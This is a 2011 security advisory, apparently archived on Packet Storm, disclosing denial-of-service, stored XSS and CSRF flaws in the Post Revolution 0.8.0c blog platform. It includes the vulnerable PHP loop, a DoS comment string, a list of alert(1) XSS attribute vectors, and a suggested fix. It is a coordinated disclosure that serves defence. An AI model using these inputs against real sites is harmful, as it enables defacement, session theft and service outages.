exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Post Revolution 0.8.0c XSS / XSRF / Denial Of Service

Post Revolution 0.8.0c XSS / XSRF / Denial Of Service
Posted Jun 1, 2011
Authored by Javier Bassi

Post Revolution version 0.8.0c suffers from cross site request forgery, cross site scripting, and denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability, xss, info disclosure, csrf
advisories | CVE-2011-1952, CVE-2011-1953, CVE-2011-1954
SHA-256 | c326ab8cc2255d5e582a5a5c103cc9b9e6e64ac1effb215d3c8e08c05d0b1799

Post Revolution 0.8.0c XSS / XSRF / Denial Of Service

Change Mirror Download
info
———————————
Name : Post Revolution 0.8.0c Multiple Remote Vulnerabilities
Class: Design Error && Input Validation Error
CVE: CVE-2011-1952, CVE-2011-1953, CVE-2011-1954
Remote: Yes
Local: No
Credit : Javier Bassi <javierbassi [at] gmail [dot] com>
Vulnerable : All versions prior to and including 0.8.0c are affected.
Vendor Hompeage : http://postrev.com.ar



description
———————————
Post Revolution is an open source blog tool and publishing platform
powered by PHP and MySQL.



discussion
———————————
Post Revolution is prone to multiple remote vulnerabilities, including:
1. A Denial of service vulnerability. (CWE-835) (CVE-2011-1952)
2. Persistent Cross-site scripting vulnerabilities. (CWE-79) (CVE-2011-1953)
3. Cross-site request forgery vulnerabilities. (CWE-352) (CVE-2011-1954)

An attacker may leverage these issues to cause a denial-of-service
condition, perform certain administrative actions, execute arbitrary
script code in the browser of an unsuspecting user in the context of
the website, steal cookie-based authentication credentials, and gain
unauthorized access to the affected application.
Post Revolution 0.8.0c is vulnerable.



timeline
———————————
2011.05.22 – Informed developers
2011.05.23 – Patch for issues 1 & 2 released.
2011.06.01 – Disclosed



details/pocs
———————————
1. Denial of Service vulnerability
Post Revolution allows some HTML tags in the comments and removes all
non-permitted.
The vulnerable code is in the lines 456 to 462 in common.php:

while(stripos($s,'<') > 0){
$pos[1] = stripos($s,'<');
$pos[2] = stripos($s,'>', $pos[1]);
$len[1] = $pos[2] - $pos[1] + 1;
$x = substr($s,$pos[1],$len[1]);
$s = str_replace($x,'',$s);
}

This code tries to remove every non-permitted HTML tag. $s is the
content of the comment. An attacker could post a comment with just
'a<' and then while(stripos($s,'<') > 0) will always be true because
pos[1]=1, pos[2] will be NULL, len[1]=0, then x = NULL so $s will be
again 'a<'.
This will cause an infinite loop that will end when php kills the
script printing:
Fatal error: Maximum execution time of 30 seconds exceeded in
/var/www/postrev/common.php on line 459


2. Cross-site scripting vulnerabilities.
Post Revolution allows the following tags in the comments:
p,strong,a,em,i,img,li,ol,video,blockquote
and don't sanitize their attributes.
So the following XSS vectors work:
<a href="javascript:alert(1)">some text</a>
<p onmouseover="javascript:alert(1)">some text</p>
<a href="" onmouseover="javascript:alert(1);">some text</a>
<em onmouseover="javascript:alert(1)">some text</em>
<strong onmouseover="javascript:alert(1)">some text</strong>
<i onmouseover="javascript:alert(1)">some text</i>
<img src="https://encrypted.google.com/images/logos/ssl_logo_lg.gif"
onmouseover="javascript:alert(1)" />
<ol><li onmouseover="javascript:alert(1)">some text</li></ol>
<ol onmouseover="javascript:alert(1)"><li>1</li><li>2</li></ol>
<blockquote onmouseover="javascript:alert(1)">some text</blockquote>

The same with other events like onclick, onmouseout, onmousemove, onkeydown, etc
Also note that the PR doesn't close the tag for you, so its not
necesary to get the comment mouseovered by the admin. If the attacker
post <p onmouseover="javascript:alert(1)">some text
mouseover event will be triggered when the admin moves the mouse
anywhere below attacker's comment.


3. Cross-site request forgery vulnerabitiles.
There is CSRF everywhere in ajax-weblog-guardar.php, verpost.php,
comments.php, perfil.php, etc. PR 0.8.0c has absolutely no protection
against CSRF in any form except for anonymous comments and
registration that has a captcha.



solution
———————————
You can fix DoS and XSS vulns fast by replacing the whole function
check_html in common.php from line 416 to 471 with
function check_html($s){
return htmlspecialchars($s);
}

Users will not be able to format their comments with HTML but Post
Revolution already has BBcode so there was no need of HTML in comments
in the first place.
NO HTML FOR YOU!

Fix the CSRFs will require some coding.
Vendor has released a patch for issues 1 and 2:
postrev.com.ar



References
——————-
1. Advisory URL: http://javierb.com.ar/2011/06/01/postrev-vunls/
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close